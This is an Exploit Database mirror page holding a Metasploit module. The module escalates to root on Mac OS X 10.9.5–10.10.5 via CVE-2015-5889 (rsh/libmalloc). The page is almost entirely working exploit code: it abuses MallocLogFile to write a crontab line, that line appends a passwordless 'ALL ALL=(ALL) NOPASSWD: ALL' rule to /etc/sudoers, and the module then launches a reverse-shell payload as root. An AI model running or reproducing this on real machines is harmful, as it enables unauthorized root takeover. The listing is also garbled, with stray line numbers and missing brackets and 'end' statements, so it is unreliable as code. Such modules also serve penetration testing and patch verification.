Apple Mac OSX 10.9.5/10.10.5 – ‘rsh/libmalloc’ Local Privilege Escalation (Metasploit)

Exploit Database
121 阅读

作者： Metasploit

日期： 2015-10-27
类别：
- local
平台：
- osx
来源：https://www.exploit-db.com/exploits/38540/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local

Rank = NormalRanking

include Msf::Post::OSX::System

include Msf::Exploit::EXE

include Msf::Exploit::FileDropper

def initialize(info = {})

super(update_info(info,

'Name' => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',

'Description'=> %q{

This module writes to the sudoers file without root access by exploiting rsh and malloc log files.

Makes sudo require no password, giving access to su even if root is disabled.

Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).

'Author' => [

'rebel',# Vulnerability discovery and PoC

'shandelman116'# Copy/paste AND translator monkey

'References' => [

['EDB', '38371'],

['CVE', '2015-5889']

'DisclosureDate' => 'Oct 1 2015',

'License'=> MSF_LICENSE,

# Want to ensure that this can be used on Python Meterpreter sessions as well

'Platform' => ['osx', 'python'],

'Arch' => [ARCH_X86_64, ARCH_PYTHON],

'SessionTypes' => ['shell', 'meterpreter'],

'Privileged' => true,

'Targets'=> [

['Mac OS X 10.9.5-10.10.5', {}]

'DefaultTarget'=> 0,

'DefaultOptions' => {

'PAYLOAD' => 'osx/x64/shell_reverse_tcp'

}

))

register_options(

[

OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),

OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])

], self.class

)

end

def exploit

# Check OS

os_check

# Check if crontab file existed already so it can be restored at cleanup

if file_exist? "/etc/crontab"

@crontab_original = read_file("/etc/crontab")

else

@crontab_original = nil

end

# Writing payload

if payload.arch.include? ARCH_X86_64

vprint_status("Writing payload to #{payload_file}.")

write_file(payload_file, payload_source)

vprint_status("Finished writing payload file.")

register_file_for_cleanup(payload_file)

elsif payload.arch.include? ARCH_PYTHON

vprint_status("No need to write payload. Will simply execute after exploit")

vprint_status("Payload encodeded is #{payload.encoded}")

end

# Run exploit

sploit

# Execute payload

print_status('Executing payload...')

if payload.arch.include? ARCH_X86_64

cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")

elsif payload.arch.include? ARCH_PYTHON

cmd_exec("python -c \"#{payload.encoded}\" & disown")

end

vprint_status("Finished executing payload.")

end

def os_check

# Get sysinfo

sysinfo = get_sysinfo

# Make sure its OS X (Darwin)

unless sysinfo["Kernel"].include? "Darwin"

print_warning("The target system does not appear to be running OS X!")

print_warning("Kernel information: #{sysinfo['Kernel']}")

return

end

# Make sure its not greater than 10.5 or less than 9.5

version = sysinfo["ProductVersion"]

minor_version = version[3...version.length].to_f

unless minor_version >= 9.5 && minor_version <= 10.5

print_warning("The target version of OS X does not appear to be compatible with the exploit!")

print_warning("Target is running OS X #{sysinfo['ProductVersion']}")

end

def sploit

user = cmd_exec("whoami").chomp

vprint_status("The current effective user is #{user}. Starting the sploit")

# Get size of sudoers file

sudoer_path = "/etc/sudoers"

size = get_stat_size(sudoer_path)

# Set up the environment and command for spawning rsh and writing to crontab file

rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"

rb_cmd = "ruby -e '#{rb_script}'"

# Attempt to execute

print_status("Attempting to write /etc/crontab...")

cmd_exec(rb_cmd)

vprint_status("Now to check whether the script worked...")

# Check whether it worked

crontab = cmd_exec("cat /etc/crontab")

vprint_status("Reading crontab yielded the following response: #{crontab}")

unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"

vprint_error("Bad news... it did not write to the file.")

fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")

end

print_good("Succesfully wrote to crontab file!")

# Wait for sudoers to change

new_size = get_stat_size(sudoer_path)

print_status("Waiting for sudoers file to change...")

# Start timeout block

begin

Timeout.timeout(datastore['WaitTime']) {

while new_size <= size

Rex.sleep(1)

new_size = get_stat_size(sudoer_path)

end

}

rescue Timeout::Error

fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")

end

print_good("Sudoers file has changed!")

# Confirming root access

print_status("Attempting to start root shell...")

cmd_exec("sudo -s su")

user = cmd_exec("whoami")

unless user.include? "root"

fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")

end

print_good("Success! Acquired root access!")

end

def get_stat_size(file_path)

cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"

response = cmd_exec(cmd)

vprint_status("Response to stat size query is #{response}")

begin

size = Integer(response)

return size

rescue ArgumentError

fail_with(Failure::UnexpectedReply, "Could not get stat size!")

end

def payload_source

if payload.arch.include? ARCH_X86_64

return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

elsif payload.arch.include? ARCH_PYTHON

return payload.encoded

end

def payload_file

@payload_file ||=

"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"

end

def cleanup

vprint_status("Starting the cron restore process...")

super

# Restore crontab back to is original state

# If we don't do this, then cron will continue to append the no password rule to sudoers.

if @crontab_original.nil?

# Erase crontab file and kill cron process since it did not exist before

vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")

rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")

if rm_ret.chomp.to_i == 0

vprint_good("Successfully removed crontab file!")

else

print_warning("Could not remove crontab file.")

end

Rex.sleep(1)

kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")

if kill_ret.chomp.to_i == 0

vprint_good("Succesfully killed cron!")

else

print_warning("Could not kill cron process.")

end

else

# Write back the original content of crontab

vprint_status("Restoring crontab file back to original contents. No need for it anymore.")

cmd_exec("echo '#{@crontab_original}' > /etc/crontab")

end

vprint_status("Finished the cleanup process.")

end